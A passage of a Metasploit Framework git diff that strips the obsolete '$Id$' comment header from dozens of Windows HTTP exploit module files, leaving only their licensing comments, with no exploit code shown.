a/modules/exploits/windows/http/coldfusion_fckeditor.rb b/modules/exploits/windows/http/coldfusion_fckeditor.rb index 26e1f20948..b72125e7bc 100644 --- a/modules/exploits/windows/http/coldfusion_fckeditor.rb +++ b/modules/exploits/windows/http/coldfusion_fckeditor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/easyftp_list.rb b/modules/exploits/windows/http/easyftp_list.rb index 5121c21175..1db1769ac4 100644 --- a/modules/exploits/windows/http/easyftp_list.rb +++ b/modules/exploits/windows/http/easyftp_list.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/edirectory_host.rb b/modules/exploits/windows/http/edirectory_host.rb index bdad26a427..3e4b07e07b 100644 --- a/modules/exploits/windows/http/edirectory_host.rb +++ b/modules/exploits/windows/http/edirectory_host.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/edirectory_imonitor.rb b/modules/exploits/windows/http/edirectory_imonitor.rb index fd05bd7e25..a695c62e7f 100644 --- a/modules/exploits/windows/http/edirectory_imonitor.rb +++ b/modules/exploits/windows/http/edirectory_imonitor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/efs_easychatserver_username.rb b/modules/exploits/windows/http/efs_easychatserver_username.rb index 4553db5729..f9f5cb5bed 100644 --- a/modules/exploits/windows/http/efs_easychatserver_username.rb +++ b/modules/exploits/windows/http/efs_easychatserver_username.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/fdm_auth_header.rb b/modules/exploits/windows/http/fdm_auth_header.rb index 8f3d605131..92d88dfaf8 100644 --- a/modules/exploits/windows/http/fdm_auth_header.rb +++ b/modules/exploits/windows/http/fdm_auth_header.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb index 344a618194..cad27bbc43 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb index 1d529ef46b..7cd782a3de 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb index bd198d694f..7504a428d2 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb index 73c700d521..e32a92c5b8 100644 --- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb +++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb index a1d48519c1..6aa0686809 100644 --- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb +++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/hp_nnm_openview5.rb b/modules/exploits/windows/http/hp_nnm_openview5.rb index b3b29e21d6..c0e6cccc48 100644 --- a/modules/exploits/windows/http/hp_nnm_openview5.rb +++ b/modules/exploits/windows/http/hp_nnm_openview5.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb index 1351e1b01f..03d92c5942 100644 --- a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb +++ b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/hp_nnm_ovas.rb b/modules/exploits/windows/http/hp_nnm_ovas.rb index 4fc428c207..dc06758a90 100644 --- a/modules/exploits/windows/http/hp_nnm_ovas.rb +++ b/modules/exploits/windows/http/hp_nnm_ovas.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb index 44b4bd323d..84dfed7810 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb index 642cb0c93b..2159bdfbb7 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb index de3912f278..739fa456de 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb index e54d4155e3..e3b6cf238e 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/hp_nnm_snmp.rb b/modules/exploits/windows/http/hp_nnm_snmp.rb index 344a69c02a..ea9a1af4b8 100644 --- a/modules/exploits/windows/http/hp_nnm_snmp.rb +++ b/modules/exploits/windows/http/hp_nnm_snmp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb index e40e3087ab..f30cc7dafe 100644 --- a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb +++ b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/hp_nnm_toolbar_01.rb b/modules/exploits/windows/http/hp_nnm_toolbar_01.rb index 14c69bdd79..594f917dd8 100644 --- a/modules/exploits/windows/http/hp_nnm_toolbar_01.rb +++ b/modules/exploits/windows/http/hp_nnm_toolbar_01.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb index 4595a621d0..c59b6bf76f 100644 --- a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb +++ b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb index f6ea65f893..7a83bc14a5 100644 --- a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb +++ b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb index 703bd32cd5..996130113b 100644 --- a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb +++ b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/hp_openview_insight_backdoor.rb b/modules/exploits/windows/http/hp_openview_insight_backdoor.rb index ce3b85c83d..32e7755964 100644 --- a/modules/exploits/windows/http/hp_openview_insight_backdoor.rb +++ b/modules/exploits/windows/http/hp_openview_insight_backdoor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/hp_power_manager_filename.rb b/modules/exploits/windows/http/hp_power_manager_filename.rb index 3b6002ea59..9019ba3260 100644 --- a/modules/exploits/windows/http/hp_power_manager_filename.rb +++ b/modules/exploits/windows/http/hp_power_manager_filename.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/hp_power_manager_login.rb b/modules/exploits/windows/http/hp_power_manager_login.rb index 72b6ab1db1..2d16879fe7 100644 --- a/modules/exploits/windows/http/hp_power_manager_login.rb +++ b/modules/exploits/windows/http/hp_power_manager_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/httpdx_handlepeer.rb b/modules/exploits/windows/http/httpdx_handlepeer.rb index 0066abf319..a7003b4b30 100644 --- a/modules/exploits/windows/http/httpdx_handlepeer.rb +++ b/modules/exploits/windows/http/httpdx_handlepeer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/httpdx_tolog_format.rb b/modules/exploits/windows/http/httpdx_tolog_format.rb index 82e3ef17eb..4354b8f855 100644 --- a/modules/exploits/windows/http/httpdx_tolog_format.rb +++ b/modules/exploits/windows/http/httpdx_tolog_format.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/ia_webmail.rb b/modules/exploits/windows/http/ia_webmail.rb index 5162c15886..673a36f1d4 100644 --- a/modules/exploits/windows/http/ia_webmail.rb +++ b/modules/exploits/windows/http/ia_webmail.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb b/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb index 8071f2862e..972ccaf46d 100644 --- a/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb +++ b/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb index a5491b3aeb..fca332c7d8 100644 --- a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb +++ b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/ibm_tsm_cad_header.rb b/modules/exploits/windows/http/ibm_tsm_cad_header.rb index bd8239243c..ed04250e0a 100644 --- a/modules/exploits/windows/http/ibm_tsm_cad_header.rb +++ b/modules/exploits/windows/http/ibm_tsm_cad_header.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/icecast_header.rb b/modules/exploits/windows/http/icecast_header.rb index 21351bca2d..b4007c3a36 100644 --- a/modules/exploits/windows/http/icecast_header.rb +++ b/modules/exploits/windows/http/icecast_header.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/integard_password_bof.rb b/modules/exploits/windows/http/integard_password_bof.rb index 1207678638..731d39d40b 100644 --- a/modules/exploits/windows/http/integard_password_bof.rb +++ b/modules/exploits/windows/http/integard_password_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/intersystems_cache.rb b/modules/exploits/windows/http/intersystems_cache.rb index d8bf88f397..c3c4359e16 100644 --- a/modules/exploits/windows/http/intersystems_cache.rb +++ b/modules/exploits/windows/http/intersystems_cache.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb b/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb index 8b63ee5051..eb3fa9cad7 100644 --- a/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb +++ b/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/kolibri_http.rb b/modules/exploits/windows/http/kolibri_http.rb index 517c42e067..34e6f6098c 100644 --- a/modules/exploits/windows/http/kolibri_http.rb +++ b/modules/exploits/windows/http/kolibri_http.rb @@ -1,8 +1,4 @@ ## -# $Id$ - -## -## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. diff --git a/modules/exploits/windows/http/mailenable_auth_header.rb b/modules/exploits/windows/http/mailenable_auth_header.rb index 5e19f654ed..52572f260c 100644 --- a/modules/exploits/windows/http/mailenable_auth_header.rb +++ b/modules/exploits/windows/http/mailenable_auth_header.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/manageengine_apps_mngr.rb b/modules/exploits/windows/http/manageengine_apps_mngr.rb index dab57ea6ac..a4568b1ef2 100644 --- a/modules/exploits/windows/http/manageengine_apps_mngr.rb +++ b/modules/exploits/windows/http/manageengine_apps_mngr.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/maxdb_webdbm_database.rb b/modules/exploits/windows/http/maxdb_webdbm_database.rb index 890d499fcc..8a087abc95 100644 --- a/modules/exploits/windows/http/maxdb_webdbm_database.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_database.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb b/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb index 40362f3bdd..77053cac03 100644 --- a/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/mcafee_epolicy_source.rb b/modules/exploits/windows/http/mcafee_epolicy_source.rb index 1208018363..dbb20255e9 100644 --- a/modules/exploits/windows/http/mcafee_epolicy_source.rb +++ b/modules/exploits/windows/http/mcafee_epolicy_source.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb b/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb index 5061c3ec76..d5fe97d29e 100644 --- a/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb +++ b/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/minishare_get_overflow.rb b/modules/exploits/windows/http/minishare_get_overflow.rb index 485ecc6a0f..1f1c538f34 100644 --- a/modules/exploits/windows/http/minishare_get_overflow.rb +++ b/modules/exploits/windows/http/minishare_get_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/navicopa_get_overflow.rb b/modules/exploits/windows/http/navicopa_get_overflow.rb index b295668360..d7fe88e753 100644 --- a/modules/exploits/windows/http/navicopa_get_overflow.rb +++ b/modules/exploits/windows/http/navicopa_get_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/novell_imanager_upload.rb b/modules/exploits/windows/http/novell_imanager_upload.rb index 616e383419..8b194091b6 100644 --- a/modules/exploits/windows/http/novell_imanager_upload.rb +++ b/modules/exploits/windows/http/novell_imanager_upload.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/novell_messenger_acceptlang.rb b/modules/exploits/windows/http/novell_messenger_acceptlang.rb index 2585ca999e..aa7ff30c84 100644 --- a/modules/exploits/windows/http/novell_messenger_acceptlang.rb +++ b/modules/exploits/windows/http/novell_messenger_acceptlang.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/nowsms.rb b/modules/exploits/windows/http/nowsms.rb index 542edb2750..be9e1560a8 100644 --- a/modules/exploits/windows/http/nowsms.rb +++ b/modules/exploits/windows/http/nowsms.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/oracle9i_xdb_pass.rb b/modules/exploits/windows/http/oracle9i_xdb_pass.rb index f7e720ecd9..8c457187db 100644 --- a/modules/exploits/windows/http/oracle9i_xdb_pass.rb +++ b/modules/exploits/windows/http/oracle9i_xdb_pass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb index 2e77f702e3..0cb35a931a 100644 --- a/modules/exploits/windows/http/osb_uname_jlist.rb +++ b/modules/exploits/windows/http/osb_uname_jlist.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/peercast_url.rb b/modules/exploits/windows/http/peercast_url.rb index 1ec395da96..c5ec42c939 100644 --- a/modules/exploits/windows/http/peercast_url.rb +++ b/modules/exploits/windows/http/peercast_url.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/privatewire_gateway.rb b/modules/exploits/windows/http/privatewire_gateway.rb index d9c7b9c0e2..84d0166c51 100644 --- a/modules/exploits/windows/http/privatewire_gateway.rb +++ b/modules/exploits/windows/http/privatewire_gateway.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/psoproxy91_overflow.rb b/modules/exploits/windows/http/psoproxy91_overflow.rb index 104dfdba0f..b7b0657a9b 100644 --- a/modules/exploits/windows/http/psoproxy91_overflow.rb +++ b/modules/exploits/windows/http/psoproxy91_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/sambar6_search_results.rb b/modules/exploits/windows/http/sambar6_search_results.rb index cde5e8bacb..c4dea8f221 100644 --- a/modules/exploits/windows/http/sambar6_search_results.rb +++ b/modules/exploits/windows/http/sambar6_search_results.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb b/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb index c8e296adee..21a8630322 100644 --- a/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb +++ b/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/sapdb_webtools.rb b/modules/exploits/windows/http/sapdb_webtools.rb index d2088552d9..8dee7523e8 100644 --- a/modules/exploits/windows/http/sapdb_webtools.rb +++ b/modules/exploits/windows/http/sapdb_webtools.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/savant_31_overflow.rb b/modules/exploits/windows/http/savant_31_overflow.rb index bb00538437..e045c16049 100644 --- a/modules/exploits/windows/http/savant_31_overflow.rb +++ b/modules/exploits/windows/http/savant_31_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/servu_session_cookie.rb b/modules/exploits/windows/http/servu_session_cookie.rb index 2cfecda6b4..993cfbaa58 100644 --- a/modules/exploits/windows/http/servu_session_cookie.rb +++ b/modules/exploits/windows/http/servu_session_cookie.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/shoutcast_format.rb b/modules/exploits/windows/http/shoutcast_format.rb index 9a786485bc..6bb065a542 100644 --- a/modules/exploits/windows/http/shoutcast_format.rb +++ b/modules/exploits/windows/http/shoutcast_format.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/shttpd_post.rb b/modules/exploits/windows/http/shttpd_post.rb index 9e792f4387..debb76277e 100644 --- a/modules/exploits/windows/http/shttpd_post.rb +++ b/modules/exploits/windows/http/shttpd_post.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/steamcast_useragent.rb b/modules/exploits/windows/http/steamcast_useragent.rb index 96727a0070..1fa617b811 100644 --- a/modules/exploits/windows/http/steamcast_useragent.rb +++ b/modules/exploits/windows/http/steamcast_useragent.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/sybase_easerver.rb b/modules/exploits/windows/http/sybase_easerver.rb index c67aa259d0..15f2cae734 100644 --- a/modules/exploits/windows/http/sybase_easerver.rb +++ b/modules/exploits/windows/http/sybase_easerver.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/trackercam_phparg_overflow.rb b/modules/exploits/windows/http/trackercam_phparg_overflow.rb index f97d42c292..a870f8fd57 100644 --- a/modules/exploits/windows/http/trackercam_phparg_overflow.rb +++ b/modules/exploits/windows/http/trackercam_phparg_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/trendmicro_officescan.rb b/modules/exploits/windows/http/trendmicro_officescan.rb index 5edbed09d1..7416360913 100644 --- a/modules/exploits/windows/http/trendmicro_officescan.rb +++ b/modules/exploits/windows/http/trendmicro_officescan.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/webster_http.rb b/modules/exploits/windows/http/webster_http.rb index 74c990400e..dcdb290552 100644 --- a/modules/exploits/windows/http/webster_http.rb +++ b/modules/exploits/windows/http/webster_http.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/xampp_webdav_upload_php.rb b/modules/exploits/windows/http/xampp_webdav_upload_php.rb index 5447d05138..abdedb9313 100644 --- a/modules/exploits/windows/http/xampp_webdav_upload_php.rb +++ b/modules/exploits/windows/http/xampp_webdav_upload_php.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/xitami_if_mod_since.rb b/modules/exploits/windows/http/xitami_if_mod_since.rb index e21bfa14c8..49d3409e6e 100644 --- a/modules/exploits/windows/http/xitami_if_mod_since.rb +++ b/modules/exploits/windows/http/xitami_if_mod_since.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/http/zenworks_uploadservlet.rb b/modules/exploits/windows/http/zenworks_uploadservlet.rb index 60088dbad1..1d3df9adeb 100644 --- a/modules/exploits/windows/http/zenworks_uploadservlet.rb +++ b/modules/exploits/windows/http/zenworks_uploadservlet.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb index 187f81b3a0..d382d657bd 100644 --- 